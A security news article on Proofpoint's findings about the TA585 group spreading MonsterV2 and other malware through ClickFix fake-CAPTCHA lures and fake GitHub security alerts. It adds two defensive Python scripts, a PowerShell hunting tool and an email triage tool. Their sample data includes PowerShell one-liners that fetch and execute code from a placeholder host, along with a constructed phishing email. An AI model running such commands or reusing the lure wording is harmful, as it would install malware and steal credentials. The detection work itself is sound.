
MonsterV2 malware spread through ClickFix campaigns

An emerging threat group is leveraging compromised websites and GitHub issues to launch ClickFix attacks spreading MonsterV2 and other malware, Proofpoint reported in a new research blog Monday.

Proofpoint noted that the threat actor, tracked as TA585, owns its own infrastructure and operates across the entire attack chain without relying on third parties, other than the malware-as-a-service (MaaS) providers whose payloads it deploys.

The main malware payload used by TA585 is MonsterV2, a backdoor, stealer and loader MaaS. TA585 has also been known to use Lumma Stealer and Rhadamanthys.

ClickFix attacks abuse compromised websites

TA585 was first spotted in April 2025, using web injects into compromised legitimate websites to serve ClickFix lures.

The injected JavaScript displays an overlay on top of the original site content, showing a fake CAPTCHA and instructing the user to copy and paste PowerShell commands to “complete the verification steps.”

TA585 uses its own filters and antibot checks rather than relying on third-party traffic distribution systems (TDS), Proofpoint said. The pasted PowerShell command downloads the malware payload from an attacker-controlled domain, while the injected script controls the redirect flow so that the victim is not returned to the legitimate page content until the malware has checked in with the attacker’s domain from the same IP address the site saw.

The attacks originally delivered Lumma Stealer, but began spreading MonsterV2 in May 2025; the Rhadamanthys infostealer has also been observed in these attacks.
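The execution chain described above (a user pastes a PowerShell one-liner that fetches and runs a remote payload) leaves a distinctive trace in process-creation telemetry: a shell whose parent is the desktop shell, with download and execute cmdlets, usually with hidden-window flags or a base64 `-EncodedCommand`. The script below is an added hunting example for this article, not Proofpoint's detection content; the events are constructed stand-ins for Sysmon Event ID 1 / Windows 4688 fields and the hostnames are placeholders.

```python
"""Hunt for ClickFix-style PowerShell launches in process-creation telemetry.

Added example for this article, not Proofpoint's detection content. The fields
(Image, ParentImage, CommandLine, User) are a simplified, constructed stand-in
for Sysmon Event ID 1 / Windows 4688 records; the URLs are placeholders.
"""
import base64
import json
import re

# Cmdlets and aliases a pasted "verification" one-liner uses to fetch a payload.
DOWNLOAD_PATTERNS = [
    r"invoke-webrequest", r"\biwr\b", r"invoke-restmethod", r"\birm\b",
    r"downloadstring", r"downloadfile", r"net\.webclient", r"start-bitstransfer",
]
# Ways the fetched content is then executed in the same process.
EXEC_PATTERNS = [r"invoke-expression", r"\biex\b", r"\|\s*iex", r"\.invoke\("]
# Flags that hide the console or disable safeguards; common in pasted commands.
HIDDEN_PATTERNS = [
    r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-noprofile",
    r"-ep\s+bypass", r"-executionpolicy\s+bypass",
]
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A shell whose parent is the desktop shell was started by the user (Run box or
# a pasted console command), not by a scheduled task or management agent.
INTERACTIVE_PARENTS = {"explorer.exe"}


def _expand_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand/-enc payload (base64 of UTF-16LE)."""
    m = re.search(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def normalize(cmdline: str) -> str:
    """Lower-case, expand base64 and strip cheap obfuscation (backticks, carets,
    quotes) so the substring rules see plain text."""
    return re.sub(r"[`^'\"]", "", _expand_encoded_command(cmdline)).lower()


def score_event(event: dict) -> dict:
    """Return the matched indicators and a verdict for one process-creation event."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = normalize(event.get("CommandLine", ""))
    hits = {
        "shell": image in SHELLS,
        "interactive_parent": parent in INTERACTIVE_PARENTS,
        "download": any(re.search(p, cmd) for p in DOWNLOAD_PATTERNS),
        "exec": any(re.search(p, cmd) for p in EXEC_PATTERNS),
        "hidden": any(re.search(p, cmd) for p in HIDDEN_PATTERNS),
    }
    if hits["shell"] and hits["interactive_parent"] and hits["download"] and hits["exec"]:
        verdict = "clickfix_high"   # user-launched shell that fetches and runs remote code
    elif hits["shell"] and hits["download"] and (hits["exec"] or hits["hidden"]):
        verdict = "suspicious"      # same behaviour under another parent: review
    else:
        verdict = "benign"
    return {"verdict": verdict, **hits}


def hunt(events_jsonl: str) -> list:
    """Score JSON-lines events and return those that are not benign."""
    findings = []
    for line in events_jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            res = score_event(ev)
            if res["verdict"] != "benign":
                findings.append({"User": ev.get("User"), "CommandLine": ev.get("CommandLine"), **res})
    return findings


# Constructed sample telemetry (not real events). The encoded command is built
# from plaintext here so the base64 decoding path is exercised.
ENCODED = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('http://payload.invalid/p.ps1')".encode("utf-16-le")
).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -nop -c "iwr http://payload.invalid/verify.ps1 | iex"'},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\services.exe", "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"User": "CORP\\carol", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -c Get-Date"},
])

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["verdict"], f["User"], f["CommandLine"][:60])
```

The parent-process condition is what separates a pasted ClickFix command from the many legitimate scripts that also use `Invoke-WebRequest`; the third sample (a management script run by a service) is scored benign for that reason. The `User` field in each finding is also the list of non-administrative accounts that would be covered by the PowerShell restriction Proofpoint recommends.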

MonsterV2: a multi-functional MaaS

MonsterV2 has remote access trojan (RAT) capabilities in addition to infostealer features and the ability to load additional payloads.

The malware can be used to exfiltrate browser and login data, credit card and crypto wallet information, Steam, Telegram and Discord tokens and files, among other data. It also has the ability to capture the victim’s desktop and webcam and replace crypto addresses found in the clipboard with attacker-provided addresses.

MonsterV2 uses hidden virtual network computing (HVNC) to establish remote desktop access without the victim’s awareness and supports a wide variety of commands received from the attacker’s command-and-control (C2) server.

The malware’s creators advertise it on cybercrime forums, offering a “standard” version for about $800 a month and an “enterprise” version with expanded features for $2,000 a month. Proofpoint noted that MonsterV2 is often packed with SonicCrypt, a crypter sold as another MaaS, to hinder analysis and detection.

GitHub issues abused in Rhadamanthys campaign

In addition to web injections, TA585 has also been observed abusing GitHub issues and email notifications to spread the Rhadamanthys infostealer.

In these attacks, TA585 @-mentions its targets in a GitHub issue written to look like a security warning email from GitHub itself. Because GitHub’s notification system emails the issue text to every mentioned user from a legitimate GitHub address, the tagged victims receive the fake security warning from a sender that passes as GitHub and may mistake it for a real alert.

A link included in the fake alert directs users to an attacker-controlled website that uses the same ClickFix fake CAPTCHA technique as TA585’s other attacks and ultimately spreads the Rhadamanthys infostealer. TA585 has been using the GitHub phishing technique since at least August 2025, according to Proofpoint.
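Because the notification really does come from GitHub, sender authentication (SPF, DKIM, DMARC) passes and is no help here; the useful signal is the combination of an @-mention notification, security-alert wording, and a link that leaves github.com. The following triage script is an added example for this article, not code from Proofpoint or GitHub. Both mails are constructed samples, the `.invalid` domains are placeholders, and it is assumed that GitHub's `X-GitHub-Reason` header carries the value `mention` for @-mention notifications.

```python
"""Triage a GitHub issue-mention notification for the fake-security-alert lure.

Added example for this article, not Proofpoint's or GitHub's code. Both mails
are constructed samples; the X-GitHub-Reason header is assumed to be "mention"
for @-mention notifications and .invalid domains are placeholders.
"""
import email
import re
from email import policy
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")
# Phrases a lure borrows from genuine GitHub security mail.
ALERT_PHRASES = ("security alert", "security warning", "unusual sign-in",
                 "action required", "verify your account")


def is_github_host(host: str) -> bool:
    """True for github.com and its subdomains; the lure's link is not one of them."""
    host = (host or "").lower()
    return (host == "github.com" or host.endswith(".github.com")
            or host.endswith(".githubusercontent.com"))


def triage_notification(raw_mail: str) -> dict:
    """Score one notification. The sender is genuinely GitHub, so the signal is
    the combination: an @-mention, alert wording, and links leaving github.com."""
    msg = email.message_from_string(raw_mail, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    subject = str(msg.get("Subject", ""))
    reason = str(msg.get("X-GitHub-Reason", "")).strip().lower()
    urls = URL_RE.findall(text)
    external = [u for u in urls if not is_github_host(urlparse(u).hostname)]
    claims_alert = any(p in (subject + "\n" + text).lower() for p in ALERT_PHRASES)
    if reason == "mention" and claims_alert and external:
        verdict = "phish_likely"   # issue comment posing as a GitHub alert, pointing off-platform
    elif external:
        verdict = "review"         # off-platform link in an issue: common, but worth a look
    else:
        verdict = "ok"
    return {"verdict": verdict, "reason": reason, "claims_alert": claims_alert,
            "external_links": external}


# Constructed sample: the lure pattern described in the article.
LURE = """\
From: someuser <notifications@github.com>
To: victim <victim@example.invalid>
Subject: [example-org/example-repo] Security Alert: unusual sign-in detected (Issue #1)
X-GitHub-Reason: mention
Content-Type: text/plain; charset=utf-8

@victim GitHub Security detected a sign-in to your account from an unrecognised device.
Action required: verify your account within 24 hours at
https://github-account-verification.invalid/verify
--
Reply to this email directly or view it on GitHub:
https://github.com/example-org/example-repo/issues/1
"""

# Constructed sample: an ordinary mention whose only link stays on github.com.
GENUINE = """\
From: teammate <notifications@github.com>
To: victim <victim@example.invalid>
Subject: [example-org/example-repo] Flaky test on Windows runner (Issue #2)
X-GitHub-Reason: mention
Content-Type: text/plain; charset=utf-8

@victim can you take a look? Logs are in the run linked from
https://github.com/example-org/example-repo/actions
"""

if __name__ == "__main__":
    for name, raw in (("lure", LURE), ("genuine", GENUINE)):
        print(name, triage_notification(raw))
```

The host check deliberately anchors on the registered domain rather than a substring, so a lookalike such as `github.com.invalid` is treated as external; the footer link GitHub itself appends to every notification stays internal and does not mask the off-platform link in the body.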

The rise of TA585 and the spread of MonsterV2 through ClickFix lures emphasize the importance of ClickFix awareness training and of preventing PowerShell execution for non-administrative users, Proofpoint concluded.
